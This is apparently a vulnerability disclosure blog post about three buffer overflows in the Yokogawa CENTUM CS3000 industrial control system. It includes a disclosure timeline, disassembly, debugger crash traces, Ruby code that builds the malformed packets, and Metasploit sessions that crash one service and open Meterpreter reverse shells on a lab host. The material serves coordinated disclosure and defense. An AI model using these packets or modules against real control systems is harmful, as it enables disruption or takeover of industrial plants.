Last updated at Sat, 19 Aug 2017 17:16:54 GMT

On Saturday, March 8th, @julianvilas and I spoke at RootedCON about our work with the Yokogawa CENTUM CS3000 product. Today, as promised, we're publishing details for three of the vulnerabilities found in the product. For all of you who weren't able to attend RootedCON, we're going just to quote the Yokogawa description of their own product in order to introduce it: "Yokogawa released CENTUM CS 3000 R3 in 1998 as the first Windows-based production control system under our brand. For over 10 years of continuous developments and enhancements, CENTUM CS 3000 R3 is equipped with functions to make it a matured system. With over 7600 systems sold worldwide, it is a field-proven system with 99.99999% of availability."

Vulnerabilities Summary

This report include details for three vulnerabilities found in different services used by the Yokogawa CENTUM CS3000 product in order to provide all its functionality. The vulnerabilities have been found in the version R3.08.50:

  • R7-2013-19.1 - BKCLogSvr.exe Heap Based Buffer Overflow: The "BKCLogSvr.exe" service, started automatically with the system, listens by default on UDP/52302. By sending a specially sequence of packets to UDP/52302 it's possible to trigger a heap based buffer overflow, after an usage of uninitialized data, which allows to DoS the “BKCLogSvr.exe”, and on last instance, could allow execution of arbitrary code with SYSTEM privileges.
  • R7-2013-19.3 - BKHOdeq.exe Stack Based Buffer Overflow: The "BKHOdeq.exe" service, started when running the "FCS / Test Function" listens by default on TCP/20109 and TCP/20171. By sending a specially crafted packet to the port TCP/20171 it's possible to trigger a stack based buffer overflow which allows execution of arbitrary code with the privileges of the CENTUM user.
  • R7-2013-19.4 - BKBCopyD.exe Stack Based Buffer Overflow: The Yokogawa Centum CS3000 solution uses different services in order to provide all its functionality. The “BKBCopyD.exe” service, started when running the “FCS / Test Function”, listens by default on TCP/20111. By sending a specially crafted packet to the port TCP/20111 it's possible to trigger a stack based buffer overflow which allows execution of arbitrary code with the privileges of the CENTUM user.

Disclosure Timeline

Date Description
Dec 27, 2013 Initial disclosure to the vendor, Yokogawa
Jan 13, 2014 Disclosure to CERT/CC
Jan 14, 2014 CERT/CC assigns VU#479196 and forwards details to JPCERT
Feb 03, 2014

CERT/CC confirms JPCERT and ICS-CERT are coordinating the vulnerabilities.

ICS-CERT tracking #: ICS-VU-205881

JPCERT tracking #: JVNVU#98181377, JPECERT#98191377
Mar 07, 2014 Yokogawa advisory published (PDF).
Mar 10, 2014 Metasploit modules published in Pull Request #3081

Technical Analysis

R7-2013-19.1 - BKCLogSvr.exe Heap Based Buffer Overflow

The BKLogSvr service listens on the UDP/52302, where expects packets sending

logs, of no more than 1024 bytes, as can be seen on the next assembly from

libbkclogsvr.dll (IDA notation):

.text:61DC1283                push    eax            ; fromlen  
.text:61DC1284                mov    eax, s  
.text:61DC1289                push    ecx            ; from  
.text:61DC128A                push    0              ; flags  
.text:61DC128C                lea    edx, [esp+42Ch+buf]  
.text:61DC1290                push    400h            ; len - packets including logs of 1024 bytes as much  
.text:61DC1295                push    edx            ; buf  
.text:61DC1296                push    eax            ; s  
.text:61DC1297                mov    [esp+438h+fromlen], 10h  
.text:61DC129F                call    recvfrom

There is a log packet sample:

"\x96\x00\x00\x00\x00\x00\x00\x00\x48\x41\x53\x00\x00\x00\x00\x00"    #........ HIS.....
"\x00\x00\x00\x00\x00\x00\x00\x00\x4c\x4f\x47\x00\x00\x00\x00\x00"    #........ LOG.....
"\x32\x30\x31\x33\x2f\x31\x31\x2f\x30\x39\x20\x31\x39\x3a\x32\x31"    #2013/11/ 09 19:21
"\x3a\x34\x32\x20\x2b\x30\x31\x3a\x30\x30\x2c\x45\x56\x45\x4e\x54"  #:42 +01: 00,EVENT
"\x2c\x30\x78\x30\x30\x30\x30\x30\x30\x30\x30\x2c\x3c\x42\x4f\x53"    #,0x00000 000,<BOS
"\x53\x56\x43\x3e\x20\x2c\x43\x3a\x5c\x43\x53\x33\x30\x30\x30\x5c"  #SVC> ,C: \CS3000\
"\x50\x52\x4f\x47\x52\x41\x4d\x5c\x42\x4b\x48\x42\x6f\x73\x53\x76"    #PROGRAM\ BKHBosSv
"\x63\x2e\x65\x78\x65\x3a\x42\x6f\x73\x53\x76\x63\x4d\x61\x69\x6e"  #c.exe:Bo sSvcMain
"\x3a\x32\x36\x32\x33\x2c\x22\x73\x74\x61\x74\x75\x73\x20\x3a\x20"  #:2623,"s tatus :
"\x42\x4f\x4f\x54\x22\x22"                                                                   #BOOT".

The meaning of the several fields, according to our understanding, is it:

Offset Field
0x0 Size
0x4 Unknown
0x8 Source
0x18 Level
0x20 Message

The heap overflow occurs while handling the creation of the path where the log will be stored. The allocation for the memory happens on sub_61DC15A0 (IDA Notation), and it's a buffer of size 0x1b8:

.text:61DC16A7                push    1B8h            ; Size  
.text:61DC16AC                call    ds:malloc      ; malloc memory: 0x1b8

When sending two consecutive packets with a long Level field, coalescing both Level and Message fields, an overflow happens after the allocation, in a strcpy style copy, resulting in the next crash:

0:005> g  
(c24.a6c): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\CS3000\LIBRARY\libbkclogsvr.dll -  
eax=00000344 ebx=01846e48 ecx=000000ae edx=01846f9c esi=023af7a8 edi=01847000  
eip=61dc1709 esp=023af708 ebp=0183de48 iopl=0 nv up ei pl nz na pe nc  
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206  
libbkclogsvr!BKCLogSvrLibResume+0x549:  
61dc1709 f3a5 rep movs dword ptr es:[edi],dword ptr [esi]  
0:004> db esi  
023af7a8 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB  
023af7b8 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB  
023af7c8 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB  
023af7d8 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB  
023af7e8 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB  
023af7f8 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB  
023af808 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB  
023af818 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB  
0:004> db edi  
01847000 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????  
01847010 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????  
01847020 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????  
01847030 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????  
01847040 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????  
01847050 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????  
01847060 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????  
01847070 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????  
0:004> db edi - 10  
01846ff0 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB  
01847000 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????  
01847010 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????  
01847020 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????  
01847030 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????  
01847040 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????  
01847050 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????  
01847060 ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ?? ????????????????  
0:004> !heap -p -a edi  
address 01847000 found in  
_DPH_HEAP_ROOT @ 17d1000  
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)  
17d19a4: 1846e48 1b8 - 1846000 2000  
7c918f01 ntdll!RtlAllocateHeap+0x00000e64  
77c2c3c9 msvcrt!_heap_alloc+0x000000e0  
77c2c3e7 msvcrt!_nh_malloc+0x00000013  
77c2c42e msvcrt!malloc+0x00000027  
61dc16b2 libbkclogsvr!BKCLogSvrLibResume+0x000004f2

At the moment of the overflow, the source of the data points to controlled data from the malformed Level/Message field.

But in order to trigger the overflow, two consecutive packets are needed. The explanation is on the stack, and how the function doesn't take care of a correct initialization of local variables:

.text:61DC16E3                lea    edi, [esp+450h+var_440] ; origin for the copy comes from here, uninitialized stack is the root cause of the overflow being exploitable.  
.text:61DC16E7                xor    eax, eax  
.text:61DC16E9                lea    edx, [ebx+12Ch]  
.text:61DC16EF                repne scasb  
.text:61DC16F1                not    ecx  
.text:61DC16F3                sub    edi, ecx  
.text:61DC16F5                push    104h  
.text:61DC16FA                mov    eax, ecx  
.text:61DC16FC                mov    esi, edi  
.text:61DC16FE                shr    ecx, 2  
.text:61DC1701                mov    edi, edx  
.text:61DC1703                lea    edx, [ebx+154h]  
.text:61DC1709                rep movsd              ; overflow happens here

The origin for the copy is a local variable, stored on the stack, which has not been initialized previously. So if malicious data can be stored on the stack, the overflow happens. It's possible to put malicious data on the stack by sending consecutive malicious packets.

As has been already explained, in order to exploit the dangerous strcpy controlled data need to be stored in the stack previously in order to abuse the uninitialized local variables. In order to accomplish it two consecutive, malformed packets, can be sent to the server:

    test = [1024].pack("V")            # packet length  
    test << "AAAA"                      # Unknown  
    test << "SOURCE\x00\x00"            # Source  
    test << "\x00" * 8                  # Padding  
    test << "B" * (1024 - test.length)  # Level & Message coalesced

When the first packet is processed by the vulnerable function, it is the stack (origin for the dangerous copy):

0:005> g
Breakpoint 0 hit
eax=00000000 ebx=005c4008 ecx=ffffffff edx=005c0608 esi=00a9f75d edi=005c41c0
eip=61dc16e3 esp=00a9f70c ebp=00000000 iopl=0 nv up ei ng nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000286
libbkclogsvr!BKCLogSvrLibResume+0x523:
61dc16e3 8d7c2410 lea edi,[esp+10h]
0:004> t
eax=00000000 ebx=005c4008 ecx=ffffffff edx=005c0608 esi=00a9f75d edi=00a9f71c
eip=61dc16e7 esp=00a9f70c ebp=00000000 iopl=0 nv up ei ng nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000286
libbkclogsvr!BKCLogSvrLibResume+0x527:
61dc16e7 33c0 xor eax,eax
0:004> db edi
00a9f71c 53 4f 55 52 43 45 42 42-42 42 42 42 42 42 00 00 SOURCEBBBBBBBB..
00a9f72c 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
00a9f73c 00 04 00 00 41 41 41 41-53 4f 55 52 43 45 00 00 ....AAAASOURCE..
00a9f74c 00 00 00 00 00 00 00 00-42 42 42 42 42 42 42 42 ........BBBBBBBB
00a9f75c 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
00a9f76c 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
00a9f77c 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
00a9f78c 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................

Later, while processing this first packet, the stack is filled with the packet contents. It occurs when flushing the contents of the log:

.text:61DC1572 call ebx ; fflush ; Here is where the stack is filled with controlled data  
.text:61DC1572 ;  
.text:61DC1572 ; ChildEBP RetAddr Args to Child  
.text:61DC1572 ; 00a9fab8 77c3035a 00000003 005c4298 000003e0 msvcrt!_write_lk+0xd6  
.text:61DC1572 ; 00a9faf4 77c3edb2 00000003 005c4298 000003e0 msvcrt!_write+0x57  
.text:61DC1572 ; 00a9fb14 77c3edf3 77c5fce0 00000000 00a9fb58 msvcrt!_flush+0x35  
.text:61DC1572 ; 00a9fb24 77c3ef26 77c5fce0 77c40ed3 7c802530 msvcrt!_fflush_lk+0xf  
.text:61DC1572 ; 00a9fb58 61dc1574 77c5fce0 00a9fb84 77c5fce0 msvcrt!fflush+0x30  
.text:61DC1572 ; WARNING: Stack unwind information not available. Following frames may be wrong.  
.text:61DC1572 ; 00a9fb60 00a9fb84 77c5fce0 0089fc60 005c3eb8 libbkclogsvr!BKCLogSvrLibResume+0x3b4

When the second packet is processed by the vulnerable function, it is the stack (origin for the dangerous copy):

0:005> g
Breakpoint 0 hit
eax=00000000 ebx=005c5240 ecx=ffffffff edx=005c0608 esi=00a9f72a edi=005c53f8
eip=61dc16e3 esp=00a9f70c ebp=005c4008 iopl=0 nv up ei ng nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000286
libbkclogsvr!BKCLogSvrLibResume+0x523:
61dc16e3 8d7c2410 lea edi,[esp+10h]
0:004> t
eax=00000000 ebx=005c5240 ecx=ffffffff edx=005c0608 esi=00a9f72a edi=00a9f71c
eip=61dc16e7 esp=00a9f70c ebp=005c4008 iopl=0 nv up ei ng nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000286
libbkclogsvr!BKCLogSvrLibResume+0x527:
61dc16e7 33c0 xor eax,eax
0:004> db edi
00a9f71c 53 4f 55 52 43 45 42 42-42 42 42 42 42 42 42 42 SOURCEBBBBBBBBBB
00a9f72c 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
00a9f73c 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
00a9f74c 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
00a9f75c 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
00a9f76c 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
00a9f77c 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
00a9f78c 42 42 42 42 42 42 42 42-42 42 42 42 42 42 42 42 BBBBBBBBBBBBBBBB
0:004> g
(430.f50): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\CS3000\LIBRARY\LibBKCCommon.dll -
eax=00000000 ebx=00000104 ecx=ffffffff edx=00a9f3ec esi=00a9fa60 edi=42424242
eip=61e51708 esp=00a9f3d8 ebp=005c5248 iopl=0 nv up ei ng nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010286
LibBKCCommon!BKCGetLogDir+0x78:
61e51708 f2ae repne scas byte ptr es:[edi]

R7-2013-19.3 - BKHOdeq.exe Stack Based Buffer Overflow

The vulnerability exists in the function “sub_41EB60” (IDA notation), which makes an insecure memory copy, while reading lines from user controlled input:

int __cdecl vulnerable_sub_41EB60(int a1, int a2)  
{  
  int v2; // eax@1  
  char v3; // cl@1  
  int result; // eax@3  
  int i; // edx@5  
  
  
  v2 = a2;  
  v3 = *(_BYTE *)a2;  
  if ( *(_BYTE *)a2 != ':' || *(_BYTE *)(a2 + 1) != ':' )  
  {  
    for ( i = 0; v3 != '\n'; ++v2 ) // Dangerous loop, copying data to a stack buffer, until an end of line is found  
    {  
      if ( v3 == '\r' )  
        break;  
      *(_BYTE *)(i + a1) = v3; // Byte copy to the stack, without having destination size into account.  
      v3 = *(_BYTE *)(v2 + 1);  
      ++i;  
    }  
    *(_BYTE *)(i + a1) = 0;  
    for ( result = v2 + 1; *(_BYTE *)result == '\n' || *(_BYTE *)result == '\r'; ++result )  
      ;  
  }  
  else  
  {  
    result = 0;  
  }  
  return result;  
}

The dangerous loop keeps copying data from the buffer pointed by the second argument, to the buffer pointed by the first argument, until a delimiter "\r" or "\n" is found.

By sending specially crafted data to the TCP/20171 port it's possible to reach the vulnerable copy function with the first argument pointing to a static size buffer stored on the stack (destination) and the argument (origin) pointing to an arbitrary user data:

.text:0041DAAD                mov    eax, [esp+2280h+arg_4] ; user controlled data, user specified length (4 bytes)  
.text:0041DAB4                lea    ecx, [esp+2280h+var_1D14] ; static buffer size on the stack  
.text:0041DABB                push    eax  
.text:0041DABC                push    ecx  
.text:0041DABD                call    vulnerable_sub_41EB60

It's possible to reach the vulnerable copy function by sending a specially crafted packet to TCP/20171. The packet must include a 16-byte fake header, where the bytes 4-7 allow setting an arbitrary data length:

header = "ABCD"                  # iMark
header << [data.length].pack("N") # Data length
header << "IJKL"                  # NumSet
header << "MN"                    # req
header << "OP"                    # Unknown

And the packet data, which can't contain "\r", "\n" or ":"" characters in order to trigger memory corruption. The arbitrary data must be longer than the static buffer size on the stack, of course.

R7-2013-19.4 - BKBCopyD.exe Stack Based Buffer Overflow

The vulnerability exists on the function “sub_409EA0” (IDA notation), used while parsing several commands accepted for the BKBCopyD.exe TCP/20111 service. The vulnerable function tries to store a received command (and its argument) on memory. But it uses a dangerous vsprintf call to store a temporary copy of the full command on the stack, where the size of the buffer is no longer enough to store commands with long arguments:

int dangerous_sub_409EA0(int a1, const char *Format, ...)  
{  
  unsigned int v2; // edx@1  
  int result; // eax@3  
  char Dest; // [sp+8h] [bp-80h]@1  
  va_list va; // [sp+94h] [bp+Ch]@1  
  
  
  va_start(va, Format);  
  vsprintf(&Dest, Format, va); // Dangerous vsprintf call  
  v2 = strlen(&Dest);  
  if ( (signed int)(dword_4230C0 + v2 + 1) > 1024 )  
  {  
    dword_4230C4 = (int)dword_4230C8;  
    dword_4230C0 = 0;  
  }  
  strcpy((char *)dword_4230C4, &Dest);  
  result = dword_4230C4 + v2 + 1;  
  dword_4230C4 += v2 + 1;  
  dword_4230C0 += v2 + 1;  
  return result;  
}

The vulnerable function is reachable through several commands which accept user provided arguments like:

  • STOR
.text:00405ED0                push    eax            ; Args  
.text:00405ED1                push    offset aStorS  ; "STOR %s"  
.text:00405ED6                push    ecx            ; int  
.text:00405ED7                call    dangerous_sub_409EA0
  • RETR
.text:00405E1E                push    edx            ; Args  
.text:00405E1F                push    offset aRetrS  ; "RETR %s"  
.text:00405E24                push    esi            ; int  
.text:00405E25                call    dangerous_sub_409EA0
  • PMODE
.text:004060A2                push    eax            ; Args  
.text:004060A3                push    offset aPmodeS  ; "PMODE %s"  
.text:004060A8                push    ecx            ; int  
.text:004060A9                call    dangerous_sub_409EA0
  • ATTR
.text:004061D1                push    ecx            ; Args  
.text:004061D2                push    offset aAttrS  ; "ATTR %s"  
.text:004061D7                push    esi            ; int  
.text:004061D8                call    dangerous_sub_409EA0
  • XATR
.text:0040627A                push    edx            ; Args  
.text:0040627B                push    offset aXatrS  ; "XATR %s"  
.text:00406280                push    esi            ; int  
.text:00406281                call    dangerous_sub_409EA0

By sending specially crafted data to the TCP/20171 port it's possible to reach the vulnerable copy function with the first argument pointing to a static size buffer stored on the stack (destination) and the argument (origin) pointing to an arbitrary user data:

.text:0041DAAD                mov    eax, [esp+2280h+arg_4] ; user controlled data, user specified length (4 bytes)  
.text:0041DAB4                lea    ecx, [esp+2280h+var_1D14] ; static buffer size on the stack  
.text:0041DABB                push    eax  
.text:0041DABC                push    ecx  
.text:0041DABD                call    vulnerable_sub_41EB60

Metasploit Modules

R7-2013-19.1 - BKCLogSvr.exe Heap Based Buffer Overflow

A proof of concept Metasploit module to trigger the Denial Of Service condition has been developed. However, a successful exploitation of the heap overflow could lead to arbitrary code execution with SYSTEM privileges.

msf > use auxiliary/dos/scada/yokogawa_logsvr  
msf auxiliary(yokogawa_logsvr) > set RHOST 192.168.172.133  
RHOST => 192.168.172.133  
set verbose truemsf auxiliary(yokogawa_logsvr) > set verbose true  
verbose => true  
msf auxiliary(yokogawa_logsvr) > run  
  
  
[*] Sending 10 packets...  
[*] Sending 1/10...  
[*] Sending 2/10...  
[*] Sending 3/10...  
[*] Sending 4/10...  
[*] Sending 5/10...  
[*] Sending 6/10...  
[*] Sending 7/10...  
[*] Sending 8/10...  
[*] Sending 9/10...  
[*] Sending 10/10...  
[*] Auxiliary module execution completed  
msf auxiliary(yokogawa_logsvr  
  
  
) >

R7-2013-19.3 - BKHOdeq.exe Stack Based Buffer Overflow

A working exploit has been developed for Yokogawa Centum CS3000 R3.08.50 (including DEP bypass in case needed), where is possible to gain arbitrary code execution, with the CENTUM user privileges, by corrupting the SEH handler stored in the stack. By default, a run of the Metasploit module will return a shell on the targeted system:

msf > use exploit/windows/scada/yokogawa_bkhodeq_bof  
msf exploit(yokogawa_bkhodeq_bof) > set rhost 192.168.172.133  
rhost => 192.168.172.133  
msf exploit(yokogawa_bkhodeq_bof) > set payload windows/meterpreter/reverse_tcp  
payload => windows/meterpreter/reverse_tcp  
msf exploit(yokogawa_bkhodeq_bof) > set lhost 192.168.172.1  
lhost => 192.168.172.1  
msf exploit(yokogawa_bkhodeq_bof) > exploit  
  
  
[*] Started reverse handler on 192.168.172.1:4444  
[*] Trying target Yokogawa Centum CS3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ], sending 8689 bytes...  
[*] Sending stage (769024 bytes) to 192.168.172.133  
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.133:1185) at 2014-03-09 16:09:28 +0100  
  
  
meterpreter > getuid  
Server username: HIS0163\CENTUM  
meterpreter > sysinfo  
Computer        : HIS0163  
OS              : Windows XP (Build 2600, Service Pack 3).  
Architecture    : x86  
System Language : en_US  
Meterpreter    : x86/win32  
meterpreter > exit  
[*] Shutting down Meterpreter...

R7-2013-19.4 - BKBCopyD.exe Stack Based Buffer Overflow

Exploitation has been confirmed at least with the commands STOR, RETR and PMODE. By sending a command with a long argument it's possible to overflow the EIP saved on the stack and gain code execution since there isn't stack cookie protection on the vulnerable function. A working exploit has been developed for Yokogawa Centum CS3000 R3.08.50, where is possible to gain arbitrary code execution, with the CENTUM user privileges, by sending a specially crafted RETR command. Again, shells are to be had:

msf> use exploit/windows/scada/yokogawa_bkbcopyd_bof  
msf exploit(yokogawa_bkbcopyd_bof) > set RHOST 192.168.172.133  
RHOST => 192.168.172.133  
msf exploit(yokogawa_bkbcopyd_bof) > check  
[*] The target service is running, but could not be validated.  
msf exploit(yokogawa_bkbcopyd_bof) > set payload windows/meterpreter/reverse_tcp  
payload => windows/meterpreter/reverse_tcp  
msf exploit(yokogawa_bkbcopyd_bof) > set LHOST 192.168.172.1  
LHOST => 192.168.172.1  
msf exploit(yokogawa_bkbcopyd_bof) > exploit  
  
  
[*] Started reverse handler on 192.168.172.1:4444  
[*] Trying target Yokogawa Centum CS3000 R3.08.50 / Windows XP SP3, sending 458 bytes...  
[*] Sending stage (770048 bytes) to 192.168.172.133  
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.133:1384) at 2014-03-03 12:20:54 -0600  
  
  
meterpreter > getuid  
Server username: HIS0163\CENTUM  
meterpreter > sysinfo  
Computer        : HIS0163  
OS              : Windows XP (Build 2600, Service Pack 3).  
Architecture    : x86  
System Language : en_US  
Meterpreter    : x86/win32  
meterpreter > exit  
[*] Shutting down Meterpreter...  
  
  
[*] 192.168.172.133 - Meterpreter session  cosed.  Reason: User exit

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments.